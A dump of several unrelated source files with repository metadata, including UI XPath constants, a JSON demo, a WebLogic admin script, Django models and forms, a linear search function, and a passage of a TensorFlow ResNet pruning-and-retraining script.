text = '//div[contains(@class,"text-wrapper")]/span[1]/span'
position_label = "LOCATION"
position_base = top_layers_base + "/div[1]"
position_icon_xpath = position_base + image
position_label_xpath = position_base + text
heatmap_label = "HEATMAP"
heatmap_base = top_layers_base + "/div[2]"
heatmap_icon_xpath = heatmap_base + image
heatmap_label_xpath = heatmap_base + text
number_label = "NUMBER"
number_base = top_layers_base + "/div[3]"
number_icon_xpath = number_base + image
number_label_xpath = number_base + text
density_label = "DENSITY"
density_base = top_layers_base + "/div[4]"
density_icon_xpath = density_base + image
density_label_xpath = density_base + text
mi_label = "MATCHING INDEX"
mi_base = top_layers_base + "/div[5]"
mi_icon_xpath = mi_base + image
mi_label_xpath = mi_base + text
timelapse_label = "LAST 7 DAYS"
timelapse_base = top_layers_base + "/div[6]"
timelapse_icon_xpath = timelapse_base + image
timelapse_label_xpath = timelapse_base + text
# Popups
popup_incident_title = """//*[@id="popup-generic"]/div/div[1]/div[2]/div[1]/div/div/div[2]"""
popup_incident_type = '//*[@id="popup-generic"]//div[contains(@class, "incidenceTable__tdType")]'
popup_incident_date = """//*[@id="incidents_table"]/div[1]/div[4]"""
popup_incident_impact = """//*[@id="popup-generic"]/div/div[1]/div[2]/div[1]/div/div/div[3]"""
popup_incident_description = """//*[@id="popup-generic"]/div/div[1]/div[2]/div[3]/p"""
popup_area_incidents = """//*[@id="popup-generic"]/div/div[1]/div[2]/div/div[2]/div/div[1]/h2[2]"""
popup_area_mi = """//*[@id="popup-generic"]/div/div[1]/div[2]/div/div[2]/div/div[2]/div/p"""
# Left Panel
title = "Incidents"
area_chart = """//*[@id="leftside"]/div/div[3]/div[1]/div[2]/div/div[1]/div[1]"""
table_asc_button = """//*[@id="leftside"]/div/div[4]/div/button[@id="ascincidences"]"""
table_desc_button = """//*[@id="leftside"]/div/div[4]/div/button[@id="descincidences"]"""
global_mi = """//*[@id="leftside"]/div/div[3]/div[2]/div[2]/div/p"""
global_incidents = """//*[@id="leftside"]/div/div[3]/div[2]/div[1]/h2[2]"""
incident_in_table = """//*[@id="incidents_table"]/div[1]"""
|
[
"gonzalo.parra@smartmatic.com"
] |
gonzalo.parra@smartmatic.com
|
a0815501c5c2236cf3afadc0f17d300fbfed87ac
|
ebe593e0f17cf228683e80885af767bda77c0e2c
|
/Json/json-types.py
|
ac0cf0ab0617803387ac87c33487e7703cc15a49
|
[] |
no_license
|
juliocsg/python-cesar
|
55c61ea2c1be638c125d3a51145b429d32643364
|
dbc4a9eea767a181d0cff5f3ce654ffdd22a76dd
|
refs/heads/master
| 2020-04-29T19:21:03.529125
| 2019-04-16T21:52:02
| 2019-04-16T21:52:02
| 176,351,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
import json
print(json.dumps({"name":"John", "age" : 30}))
print(json.dumps(["apple", "bananas"]))
print(json.dumps(("apple", "bananas")))
print(json.dumps("hello"))
print(json.dumps(42))
print(json.dumps(31.76))
print(json.dumps(True))
print(json.dumps(False))
print(json.dumps(None))
|
[
"jcesarsaucedo1993@gmail.com"
] |
jcesarsaucedo1993@gmail.com
|
631eff29fcaf2865ed65ee90e0f051d4a6fa53a9
|
331080f6ac4063803f97c2f95ef32b53b58e1c23
|
/env/bin/pyrsa-verify
|
e9559a0046017f8b829b719266220b1ab4931a95
|
[
"MIT"
] |
permissive
|
jlwysf/onduty
|
c881f692ad6cd76a77539c1ba325b5a53bf44bb7
|
20d90583a6996d037912af08eb29a6d6fa06bf66
|
refs/heads/master
| 2020-04-13T13:13:09.063357
| 2018-12-26T22:48:58
| 2018-12-26T22:48:58
| 163,223,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
#!/Users/ewang/SRE/openduty/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from rsa.cli import verify
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(verify())
|
[
"ewang@Erics-MacBook-Pro.local"
] |
ewang@Erics-MacBook-Pro.local
|
|
b12ab9e2c989a357198e7f9d97c41992e5d033e4
|
d9216275d4c9be88a57d4b0a8b63146ca741193a
|
/Wlst/wlst/CreateWorkManagerRaiseVoiceActivity.py
|
ae8207d9f82d26d8ae2a80094b6dfabeb1f518ab
|
[] |
no_license
|
simon-cutts/message-broker
|
9fd0363e85d21398048b1f0c4907da7ef3bb8358
|
8c8a20bf56fd8e101b5e7114f2e8bdd9721c2683
|
refs/heads/master
| 2021-04-02T03:41:13.572300
| 2020-03-18T13:53:07
| 2020-03-18T13:53:07
| 248,239,797
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,389
|
py
|
if __name__ == '__main__':
from wlstModule import *#@UnusedWildImport
"""
Creates following items:
RaiseVoiceActivityWorkManager
RaiseVoiceActivityMaxThreadsConstraint
Author: Simon Cutts
"""
import sys
from java.lang import System
from java.io import FileInputStream
from java.lang import String
" Load the properties file"
propInputStream = FileInputStream("build.properties")
configProps = Properties()
configProps.load(propInputStream)
" Set the properties"
username = configProps.get("username")
password = configProps.get("password")
adminUrl=configProps.get("adminUrl")
domain = configProps.get("domain")
clusterName = configProps.get("cluster")
" Connect to the server "
connect(userConfigFile=username,userKeyFile=password,url=adminUrl)
edit()
startEdit()
print 'Creating WorkManager RaiseVoiceActivityWorkManager '
cd('/SelfTuning/' + domain)
cmo.createWorkManager('RaiseVoiceActivityWorkManager')
cd('/SelfTuning/' + domain + '/WorkManagers/RaiseVoiceActivityWorkManager')
" Normally targeted to the cluster, except on developer machines "
if clusterName == "OSB_Cluster":
set('Targets',jarray.array([ObjectName('com.bea:Name=OSB_Cluster,Type=Cluster')], ObjectName))
else:
set('Targets',jarray.array([ObjectName('com.bea:Name=AdminServer,Type=Server')], ObjectName))
print 'Creating MaxThreadsConstraints RaiseVoiceActivityMaxThreadsConstraint '
cd('/SelfTuning/' + domain)
cmo.createMaxThreadsConstraint('RaiseVoiceActivityMaxThreadsConstraint')
cd('/SelfTuning/' + domain + '/MaxThreadsConstraints/RaiseVoiceActivityMaxThreadsConstraint')
" Normally targeted to the cluster, except on developer machines "
if clusterName == "OSB_Cluster":
set('Targets',jarray.array([ObjectName('com.bea:Name=OSB_Cluster,Type=Cluster')], ObjectName))
else:
set('Targets',jarray.array([ObjectName('com.bea:Name=AdminServer,Type=Server')], ObjectName))
cmo.setCount(2)
cmo.unSet('ConnectionPoolName')
cd('/SelfTuning/' + domain + '/WorkManagers/RaiseVoiceActivityWorkManager')
cmo.setMaxThreadsConstraint(getMBean('/SelfTuning/' + domain + '/MaxThreadsConstraints/RaiseVoiceActivityMaxThreadsConstraint'))
try:
save()
activate(block="true")
except Exception, e:
print e
print "Error while trying to save and/or activate!!!"
dumpStack()
raise
|
[
"noreply@github.com"
] |
simon-cutts.noreply@github.com
|
8b8b51d84dacfded491424244b983408e007a638
|
47ba27c8054fafe7aa96a45cc77deb64e2b4b365
|
/luggageaccomodation/apps/accounts/models.py
|
305fad8b25228897398e882733bd358a8fa3f03b
|
[] |
no_license
|
gouth-tech/luggage-accomodation
|
349a088bb81823a49094c8e378bb14d8671b2d5f
|
fe4083814b457a585d81113fbb46f3ebfa6fe309
|
refs/heads/master
| 2022-05-01T03:34:57.473100
| 2019-11-08T10:31:21
| 2019-11-08T10:31:21
| 220,246,093
| 0
| 0
| null | 2022-04-22T22:37:45
| 2019-11-07T13:41:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,322
|
py
|
from django.contrib.auth.models import AbstractUser
from django.db import models
from .managers import UserManager
from django.utils.translation import ugettext_lazy as _
from rest_framework.authtoken.models import Token
from django.utils import timezone
from django.conf import settings
# Create your models here.
class User(AbstractUser):
STATUS_CHOICES = (
(1, _("Luggage Accomodator")),
(2, _("Luggage Keeper")),
)
username = models.CharField(blank=True, max_length=20)
email = models.EmailField(_('email address'), unique=True,
error_messages={'unique': 'A user with that email already exists.'},
blank=True
)
password = models.CharField(_('password'), max_length=100, blank=True)
user_type = models.IntegerField(choices=STATUS_CHOICES, default=1)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
def __str__(self):
if self.first_name:
return self.first_name + " " + self.last_name
else:
return self.email
class ExpiringToken(Token):
class Meta(object):
proxy = True
def expired(self):
now = timezone.now()
return self.created < now - settings.EXPIRING_TOKEN_LIFESPAN
|
[
"goutham.m@hashroot.com"
] |
goutham.m@hashroot.com
|
446e27b184c619ef0fc295e80630f81e473b9db4
|
8b917e58028112b8c760df4f22151ec7f1b84e8f
|
/forms.py
|
8ccdf00dbeb3d3f82566d4315becd3d054eaa6e2
|
[] |
no_license
|
nandini345372/test-app
|
69112ce091d8f0ff6896dabd482a10d9ab288df4
|
8d2d7f066ae710a6b98262b5068e4abe8cd026ed
|
refs/heads/main
| 2023-02-02T08:02:46.389467
| 2020-12-19T06:21:01
| 2020-12-19T06:21:01
| 322,778,711
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 181
|
py
|
from django import forms
from .models import *
class Blogform(forms.ModelForm):
class Meta:
model = BlogModel
fields = [ "title", "description","image"]
|
[
"noreply@github.com"
] |
nandini345372.noreply@github.com
|
194ec94053ff6e9031800e98c0f2c4fe8a995fe0
|
aa7fa2d977bf84c8e297f5a831fed5b84f4efcc0
|
/Python/Search/linear_search.py
|
b2f9a92cb7ac0e18eb3348e9e1dd168f9302eae0
|
[] |
no_license
|
Divi2701/Algorithms
|
6dafaa2cbf3ce82bf08e83cb7b8bea2f9fd22821
|
1195e311a6f93c50ad66954b715a3dd770a62759
|
refs/heads/master
| 2023-08-15T23:12:55.741703
| 2021-10-18T14:22:01
| 2021-10-18T14:22:01
| 418,635,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,087
|
py
|
def linear_search(arr, target) -> str:
"""
Linear Search Algorithm
status = linear_search(arr, target)
>>> Enter list: 4 5 3 7 2 0 4 62 21
Enter target: 62
Found
>>> Enter list: 4 5 3 7 2 0 4 62 21
Enter target: 300
Not Found
>>> Enter list: 4,5,3,7 2 0 4 62 21
Enter target: 62
There is value error in input. Please re-enter values.
>>> Enter list: 4 5 3 7 2 0 4 62 21
Enter target: 62 4
There is value error in input. Please re-enter values.
"""
flag = False
for i in range(len(arr)):
if target == arr[i]:
flag = True
break
if not flag == False:
return "Found"
return "Not Found"
if __name__ == "__main__":
try:
arr = list(map(int, input("Enter list: ").strip().split()))
target_x = int(input("Enter target: ").strip())
status = linear_search(arr, target_x)
print(status)
except ValueError or NameError:
print("There is value error in input. Please re-enter values. ")
|
[
"official.aakas@gmail.com"
] |
official.aakas@gmail.com
|
9355d800643a3743a49f70a15151c2832ff29f35
|
a5d0751624cccdaacef0099c03c0d7b1c30546b6
|
/basemix_manual_configs.py
|
1899ed0632974a310b7dce4eb62c3befd1377dcd
|
[] |
no_license
|
anonymous3224/slim-gtsn
|
8fcbf211e9f55b848679673fd25e1768dc87c8a4
|
97c888adcff61a3b37ebdf2ddeeed5aa5460c92d
|
refs/heads/master
| 2020-04-18T10:15:56.089213
| 2019-01-25T02:16:06
| 2019-01-25T02:16:06
| 167,094,169
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,224
|
py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified by Hui Guan,
# prune once and train
# prune all the valid layers and train the network with the objective being cross-entropy+regularization.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.client import timeline
from datasets import dataset_factory
from deployment import model_deploy
from nets import nets_factory
from preprocessing import preprocessing_factory
import numpy as np
import re, time, math , os, sys
from datetime import datetime
from pprint import pprint
from train_helper import *
from train_helper_for_resnet_v1_50 import *
slim = tf.contrib.slim
tf.app.flags.DEFINE_string(
'master', '', 'The address of the TensorFlow master to use.')
tf.app.flags.DEFINE_string(
'train_dir', '/tmp/tfmodel/',
'Directory where checkpoints and event logs are written to.')
tf.app.flags.DEFINE_integer('num_clones', 1,
'Number of model clones to deploy.')
tf.app.flags.DEFINE_boolean('clone_on_cpu', False,
'Use CPUs to deploy clones.')
tf.app.flags.DEFINE_integer('worker_replicas', 1, 'Number of worker replicas.')
tf.app.flags.DEFINE_integer(
'num_ps_tasks', 0,
'The number of parameter servers. If the value is 0, then the parameters '
'are handled locally by the worker.')
tf.app.flags.DEFINE_integer(
'num_readers', 10,
'The number of parallel readers that read data from the dataset.')
tf.app.flags.DEFINE_integer(
'num_preprocessing_threads', 16,
'The number of threads used to create the batches.')
tf.app.flags.DEFINE_integer(
'log_every_n_steps', 10,
'The frequency with which logs are print.')
tf.app.flags.DEFINE_integer(
'summary_every_n_steps', 50,
'The frequency with which summary op are done.')
tf.app.flags.DEFINE_integer(
'evaluate_every_n_steps', 100,
'The frequency with which evaluation are done.')
tf.app.flags.DEFINE_integer(
'runmeta_every_n_steps', 1000,
'The frequency with which RunMetadata are done.')
tf.app.flags.DEFINE_integer(
'save_summaries_secs', 600,
'The frequency with which summaries are saved, in seconds.')
tf.app.flags.DEFINE_integer(
'save_interval_secs', 600,
'The frequency with which the model is saved, in seconds.')
tf.app.flags.DEFINE_integer(
'task', 0, 'Task id of the replica running the training.')
######################
# Optimization Flags #
######################
tf.app.flags.DEFINE_float(
'weight_decay', 0.00004, 'The weight decay on the model weights.')
tf.app.flags.DEFINE_string(
'optimizer', 'rmsprop',
'The name of the optimizer, one of "adadelta", "adagrad", "adam",'
'"ftrl", "momentum", "sgd" or "rmsprop".')
tf.app.flags.DEFINE_float(
'adadelta_rho', 0.95,
'The decay rate for adadelta.')
tf.app.flags.DEFINE_float(
'adagrad_initial_accumulator_value', 0.1,
'Starting value for the AdaGrad accumulators.')
tf.app.flags.DEFINE_float(
'adam_beta1', 0.9,
'The exponential decay rate for the 1st moment estimates.')
tf.app.flags.DEFINE_float(
'adam_beta2', 0.999,
'The exponential decay rate for the 2nd moment estimates.')
tf.app.flags.DEFINE_float('opt_epsilon', 1.0, 'Epsilon term for the optimizer.')
tf.app.flags.DEFINE_float('ftrl_learning_rate_power', -0.5,
'The learning rate power.')
tf.app.flags.DEFINE_float(
'ftrl_initial_accumulator_value', 0.1,
'Starting value for the FTRL accumulators.')
tf.app.flags.DEFINE_float(
'ftrl_l1', 0.0, 'The FTRL l1 regularization strength.')
tf.app.flags.DEFINE_float(
'ftrl_l2', 0.0, 'The FTRL l2 regularization strength.')
tf.app.flags.DEFINE_float(
'momentum', 0.9,
'The momentum for the MomentumOptimizer and RMSPropOptimizer.')
tf.app.flags.DEFINE_float('rmsprop_momentum', 0.9, 'Momentum.')
tf.app.flags.DEFINE_float('rmsprop_decay', 0.9, 'Decay term for RMSProp.')
#######################
# Learning Rate Flags #
#######################
tf.app.flags.DEFINE_string(
'learning_rate_decay_type',
'exponential',
'Specifies how the learning rate is decayed. One of "fixed", "exponential",'
' or "polynomial"')
tf.app.flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')
tf.app.flags.DEFINE_float(
'end_learning_rate', 0.0001,
'The minimal end learning rate used by a polynomial decay learning rate.')
tf.app.flags.DEFINE_float(
'label_smoothing', 0.0, 'The amount of label smoothing.')
tf.app.flags.DEFINE_float(
'learning_rate_decay_factor', 0.94, 'Learning rate decay factor.')
tf.app.flags.DEFINE_float(
'num_epochs_per_decay', 2.0,
'Number of epochs after which learning rate decays.')
tf.app.flags.DEFINE_bool(
'sync_replicas', False,
'Whether or not to synchronize the replicas during training.')
tf.app.flags.DEFINE_integer(
'replicas_to_aggregate', 1,
'The Number of gradients to collect before updating params.')
tf.app.flags.DEFINE_float(
'moving_average_decay', None,
'The decay to use for the moving average.'
'If left as None, then moving averages are not used.')
#######################
# Dataset Flags #
#######################
tf.app.flags.DEFINE_string(
'dataset_name', 'imagenet', 'The name of the dataset to load.')
tf.app.flags.DEFINE_string(
'dataset_split_name', 'train', 'The name of the train/test split.')
tf.app.flags.DEFINE_string(
'dataset_dir', None, 'The directory where the dataset files are stored.')
tf.app.flags.DEFINE_integer(
'labels_offset', 0,
'An offset for the labels in the dataset. This flag is primarily used to '
'evaluate the VGG and ResNet architectures which do not use a background '
'class for the ImageNet dataset.')
tf.app.flags.DEFINE_string(
'model_name', 'inception_v3', 'The name of the architecture to train.')
tf.app.flags.DEFINE_string(
'preprocessing_name', None, 'The name of the preprocessing to use. If left '
'as `None`, then the model_name flag is used.')
tf.app.flags.DEFINE_integer(
'batch_size', 32, 'The number of samples in each batch.')
tf.app.flags.DEFINE_integer(
'train_image_size', 224, 'Train image size')
tf.app.flags.DEFINE_integer('max_number_of_steps', None,
'The maximum number of training steps.')
#####################
# Fine-Tuning Flags #
#####################
tf.app.flags.DEFINE_string(
'checkpoint_path', None,
'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
'checkpoint_exclude_scopes', None,
'Comma-separated list of scopes of variables to exclude when restoring '
'from a checkpoint.')
tf.app.flags.DEFINE_string(
'trainable_scopes', None,
'Comma-separated list of scopes to filter the set of variables to train.'
'By default, None would train all the variables.')
tf.app.flags.DEFINE_boolean(
'ignore_missing_vars', False,
'When restoring a checkpoint would ignore missing variables.')
## added by Hui Guan,
tf.app.flags.DEFINE_string(
'net_name_scope_checkpoint', 'resnet_v1_50',
'The name scope for the saved previous trained network')
tf.app.flags.DEFINE_string(
'net_name_scope_pruned', 'resnet_v1_50_pruned',
'The name scope of pruned network in the current graph.')
tf.app.flags.DEFINE_string(
'configs_path', './configs_greedy/manual_configs.txt',
'The path to the manually defined configuarations')
tf.app.flags.DEFINE_integer(
'config_id', 0,
'The configuration to be evaluate')
tf.app.flags.DEFINE_integer(
'test_batch_size', 32, 'The number of samples in each batch for the test dataset.')
tf.app.flags.DEFINE_string(
'train_dataset_name', 'train', 'The name of the train/test split.')
tf.app.flags.DEFINE_string(
'test_dataset_name', 'val', 'The name of the train/test split.')
tf.app.flags.DEFINE_boolean(
'continue_training', False,
'if continue training is true, then do not clean the train directory.')
tf.app.flags.DEFINE_integer(
'max_to_keep', 5, 'The number of models to keep.')
FLAGS = tf.app.flags.FLAGS
def get_init_values_for_pruned_layers(prune_scopes, shorten_scopes, kept_percentage):
""" prune layers iteratively so prune_scopes and shorten scopes should be of size one. """
graph = tf.Graph()
with graph.as_default():
deploy_config = model_deploy.DeploymentConfig(
num_clones=FLAGS.num_clones,
clone_on_cpu=FLAGS.clone_on_cpu,
replica_id=FLAGS.task,
num_replicas=FLAGS.worker_replicas,
num_ps_tasks=FLAGS.num_ps_tasks)
dataset = dataset_factory.get_dataset(
FLAGS.dataset_name, 'train', FLAGS.dataset_dir)
batch_queue = train_inputs(dataset, deploy_config, FLAGS)
images, _ = batch_queue.dequeue()
network_fn = nets_factory.get_network_fn(
FLAGS.model_name,
num_classes=(dataset.num_classes - FLAGS.labels_offset),
weight_decay=FLAGS.weight_decay
)
network_fn(images, is_training=False)
with tf.Session() as sess:
load_checkpoint(sess, FLAGS.checkpoint_path)
variables_init_value = get_pruned_kernel_matrix(sess, prune_scopes, shorten_scopes, kept_percentage)
# remove graph
del graph
return variables_init_value
def read_manual_configs(manual_configs_path):
with open(manual_configs_path, 'r') as f:
lines = f.readlines()
configs = []
for line in lines:
line = line.strip()
if line:
config = map(float, line.split(','))
configs.append(config)
return configs
def main(_):
tic = time.time()
print('tensorflow version:', tf.__version__)
tf.logging.set_verbosity(tf.logging.INFO)
if not FLAGS.dataset_dir:
raise ValueError('You must supply the dataset directory with --dataset_dir')
# init
net_name_scope_pruned = FLAGS.net_name_scope_pruned
net_name_scope_checkpoint = FLAGS.net_name_scope_checkpoint
# get configs
configs = read_manual_configs(FLAGS.configs_path)
config_id = FLAGS.config_id
config = configs[config_id]
indexed_prune_scopes = valid_indexed_prune_scopes
kept_percentage = []
for i, kp in enumerate(config):
kept_percentage.extend([kp, kp])
# prepare for training with the specific config
prune_info = indexed_prune_scopes_to_prune_info(indexed_prune_scopes, kept_percentage)
# prepare file system
results_dir = os.path.join(FLAGS.train_dir, 'id'+str(config_id)) #+'_'+str(FLAGS.max_number_of_steps))
train_dir = os.path.join(results_dir, 'train')
if (not FLAGS.continue_training) or (not tf.train.latest_checkpoint(train_dir)):
prune_scopes = indexed_prune_scopes_to_prune_scopes(indexed_prune_scopes, net_name_scope_checkpoint)
shorten_scopes = indexed_prune_scopes_to_shorten_scopes(indexed_prune_scopes, net_name_scope_checkpoint)
variables_init_value = get_init_values_for_pruned_layers(prune_scopes, shorten_scopes, kept_percentage)
reinit_scopes = [re.sub(net_name_scope_checkpoint, net_name_scope_pruned, v) for v in prune_scopes+shorten_scopes]
prepare_file_system(train_dir)
def write_detailed_info(info):
with open(os.path.join(train_dir, 'train_details.txt'), 'a') as f:
f.write(info+'\n')
info = 'train_dir:'+train_dir+'\n'
info += 'config_id:'+ str(config_id)+'\n'
info += 'configuration: '+ str(config)+'\n'
info += 'indexed_prune_scopes: ' + str(indexed_prune_scopes)+'\n'
info += 'kept_percentage: ' + str(kept_percentage)
print(info)
write_detailed_info(info)
with tf.Graph().as_default():
#######################
# Config model_deploy #
#######################
deploy_config = model_deploy.DeploymentConfig(
num_clones=FLAGS.num_clones,
clone_on_cpu=FLAGS.clone_on_cpu,
replica_id=FLAGS.task,
num_replicas=FLAGS.worker_replicas,
num_ps_tasks=FLAGS.num_ps_tasks)
######################
# Select the dataset #
######################
dataset = dataset_factory.get_dataset(
FLAGS.dataset_name, FLAGS.train_dataset_name, FLAGS.dataset_dir)
test_dataset = dataset_factory.get_dataset(
FLAGS.dataset_name, FLAGS.test_dataset_name , FLAGS.dataset_dir)
batch_queue = train_inputs(dataset, deploy_config, FLAGS)
test_images, test_labels = test_inputs(test_dataset, deploy_config, FLAGS)
images, labels = batch_queue.dequeue()
######################
# Select the network#
######################
network_fn_pruned = nets_factory.get_network_fn_pruned(
FLAGS.model_name,
prune_info=prune_info,
num_classes=(dataset.num_classes - FLAGS.labels_offset),
weight_decay=FLAGS.weight_decay)
print('HG: prune_info:')
pprint(prune_info)
####################
# Define the model #
####################
logits_train, _ = network_fn_pruned(images, is_training=True, is_local_train=False, reuse_variables=False, scope = net_name_scope_pruned)
logits_eval, _ = network_fn_pruned(test_images, is_training=False, is_local_train=False, reuse_variables=True, scope = net_name_scope_pruned)
cross_entropy = add_cross_entropy(logits_train, labels)
correct_prediction = add_correct_prediction(logits_eval, test_labels)
#############################
# Specify the loss function #
#############################
tf.add_to_collection('subgraph_losses', cross_entropy)
# get regularization loss
regularization_losses = get_regularization_losses_within_scopes()
print_list('regularization_losses', regularization_losses)
# total loss and its summary
total_loss=tf.add_n(tf.get_collection('subgraph_losses'), name='total_loss')
for l in tf.get_collection('subgraph_losses')+[total_loss]:
tf.summary.scalar(l.op.name+'/summary', l)
#########################################
# Configure the optimization procedure. #
#########################################
with tf.device(deploy_config.variables_device()):
global_step = tf.Variable(0, trainable=False, name='global_step')
with tf.device(deploy_config.optimizer_device()):
learning_rate = configure_learning_rate(dataset.num_samples, global_step, FLAGS)
optimizer = configure_optimizer(learning_rate, FLAGS)
tf.summary.scalar('learning_rate', learning_rate)
#############################
# Add train operation #
#############################
variables_to_train = get_trainable_variables_within_scopes()
train_op = add_train_op(optimizer, total_loss, global_step, var_list=variables_to_train)
print_list("variables_to_train", variables_to_train)
# Gather update_ops: the updates for the batch_norm variables created by network_fn_pruned.
update_ops = get_update_ops_within_scopes()
print_list("update_ops", update_ops)
# add train_tensor
update_ops.append(train_op)
update_op = tf.group(*update_ops)
with tf.control_dependencies([update_op]):
train_tensor = tf.identity(total_loss, name='train_op')
# add summary op
summary_op = tf.summary.merge_all()
print("HG: trainable_variables=", len(tf.trainable_variables()))
print("HG: model_variables=", len(tf.model_variables()))
print("HG: global_variables=", len(tf.global_variables()))
sess_config = tf.ConfigProto(intra_op_parallelism_threads=16,
inter_op_parallelism_threads=16)
with tf.Session(config=sess_config) as sess:
###########################
# Prepare for filewriter. #
###########################
train_writer = tf.summary.FileWriter(train_dir, sess.graph)
# if restart the training or there is no checkpoint in the train_dir
if (not FLAGS.continue_training) or (not tf.train.latest_checkpoint(train_dir)):
#########################################
# Reinit pruned model variable #
#########################################
variables_to_reinit = get_model_variables_within_scopes(reinit_scopes)
print_list("Initialize pruned variables", variables_to_reinit)
assign_ops = []
for v in variables_to_reinit:
key = re.sub(net_name_scope_pruned, net_name_scope_checkpoint, v.op.name)
if key in variables_init_value:
value = variables_init_value.get(key)
# print(key, value)
assign_ops.append(tf.assign(v, tf.convert_to_tensor(value), validate_shape=True))
# v.set_shape(value.shape)
else:
raise ValueError("Key not in variables_init_value, key=", key)
assign_op = tf.group(*assign_ops)
sess.run(assign_op)
#################################################
# Restore unchanged model variable. #
#################################################
variables_to_restore = {re.sub(net_name_scope_pruned, net_name_scope_checkpoint, v.op.name):
v for v in get_model_variables_within_scopes()
if v not in variables_to_reinit}
print_list("restore model variables", variables_to_restore.values())
load_checkpoint(sess, FLAGS.checkpoint_path, var_list=variables_to_restore)
else:
###########################################
## Restore all variables from checkpoint ##
###########################################
variables_to_restore = get_global_variables_within_scopes()
load_checkpoint(sess, train_dir, var_list = variables_to_restore)
#################################################
# init unitialized global variable. #
#################################################
variables_to_init = get_global_variables_within_scopes(sess.run( tf.report_uninitialized_variables() ))
print_list("init unitialized variables", variables_to_init)
sess.run( tf.variables_initializer(variables_to_init) )
init_global_step_value = sess.run(global_step)
print('initial global step: ', init_global_step_value)
if init_global_step_value >= FLAGS.max_number_of_steps:
print('Exit: init_global_step_value (%d) >= FLAG.max_number_of_steps (%d)' \
%(init_global_step_value, FLAGS.max_number_of_steps))
return
###########################
# Record CPU usage #
###########################
# mpstat_output_filename = os.path.join(train_dir, "cpu-usage.log")
# os.system("mpstat -P ALL 1 > " + mpstat_output_filename + " 2>&1 &")
###########################
# Kicks off the training. #
###########################
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
saver = tf.train.Saver(max_to_keep=FLAGS.max_to_keep)
print('HG: # of threads=', len(threads))
duration = 0
duration_cnt = 0
train_time = 0
train_only_cnt = 0
print("start to train at:", datetime.now())
for i in range(init_global_step_value, FLAGS.max_number_of_steps+1):
# run optional meta data, or summary, while run train tensor
#if i < FLAGS.max_number_of_steps:
if i > init_global_step_value:
# train while run metadata
if i % FLAGS.runmeta_every_n_steps == FLAGS.runmeta_every_n_steps-1:
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
loss_value = sess.run(train_tensor,
options = run_options,
run_metadata=run_metadata)
train_writer.add_run_metadata(run_metadata, 'step%d-train' % i)
# Create the Timeline object, and write it to a json file
fetched_timeline = timeline.Timeline(run_metadata.step_stats)
chrome_trace = fetched_timeline.generate_chrome_trace_format()
with open(os.path.join(train_dir, 'timeline_'+str(i)+'.json'), 'w') as f:
f.write(chrome_trace)
# train while record summary
elif i % FLAGS.summary_every_n_steps==0:
train_summary, loss_value = sess.run([summary_op, train_tensor])
train_writer.add_summary(train_summary, i)
# train only
else:
start_time = time.time()
loss_value = sess.run(train_tensor)
train_only_cnt+=1
train_time += time.time() - start_time
duration_cnt +=1
duration += time.time()- start_time
# log loss information
if i%FLAGS.log_every_n_steps==0 and duration_cnt >0:
log_frequency = duration_cnt
examples_per_sec = log_frequency * FLAGS.batch_size / duration
sec_per_batch = float(duration /log_frequency)
summary = tf.Summary()
summary.value.add(tag='examples_per_sec', simple_value=examples_per_sec)
summary.value.add(tag='sec_per_batch', simple_value=sec_per_batch)
train_writer.add_summary(summary, i)
format_str = ('%s: step %d, loss = %.3f (%.1f examples/sec; %.3f sec/batch)')
print(format_str % (datetime.now(), i, loss_value, examples_per_sec, sec_per_batch))
duration = 0
duration_cnt = 0
info= format_str % (datetime.now(), i, loss_value, examples_per_sec, sec_per_batch)
write_detailed_info(info)
else:
# run only total loss when i=0
train_summary, loss_value = sess.run([summary_op, total_loss]) #loss_value = sess.run(total_loss)
train_writer.add_summary(train_summary, i)
format_str = ('%s: step %d, loss = %.3f')
print(format_str % (datetime.now(), i, loss_value))
info= format_str % (datetime.now(), i, loss_value)
write_detailed_info(info)
# record the evaluation accuracy
is_last_step = (i==FLAGS.max_number_of_steps)
if i%FLAGS.evaluate_every_n_steps==0 or is_last_step:
#run_meta = (i==FLAGS.evaluate_every_n_steps)
test_accuracy, run_metadata = evaluate_accuracy(sess, coord, test_dataset.num_samples,
test_images, test_labels, test_images, test_labels,
correct_prediction, FLAGS.test_batch_size, run_meta=False)
summary = tf.Summary()
summary.value.add(tag='accuracy', simple_value=test_accuracy)
train_writer.add_summary(summary, i)
#if run_meta:
# eval_writer.add_run_metadata(run_metadata, 'step%d-eval' % i)
info=('%s: step %d, test_accuracy = %.6f') % (datetime.now(), i, test_accuracy)
print(info)
write_detailed_info(info)
###########################
# Save model parameters . #
###########################
#saver = tf.train.Saver(var_list=get_model_variables_within_scopes([net_name_scope_pruned+'/']))
save_path = saver.save(sess, os.path.join(train_dir, 'model.ckpt-'+str(i)))
print("HG: Model saved in file: %s" % save_path)
coord.request_stop()
coord.join(threads)
total_time = time.time()-tic
train_speed = train_time*1.0/train_only_cnt
train_time = train_speed*(FLAGS.max_number_of_steps) # - init_global_step_value) #/train_only_cnt
info = "HG: training speed(sec/batch): %.6f\n" %(train_speed)
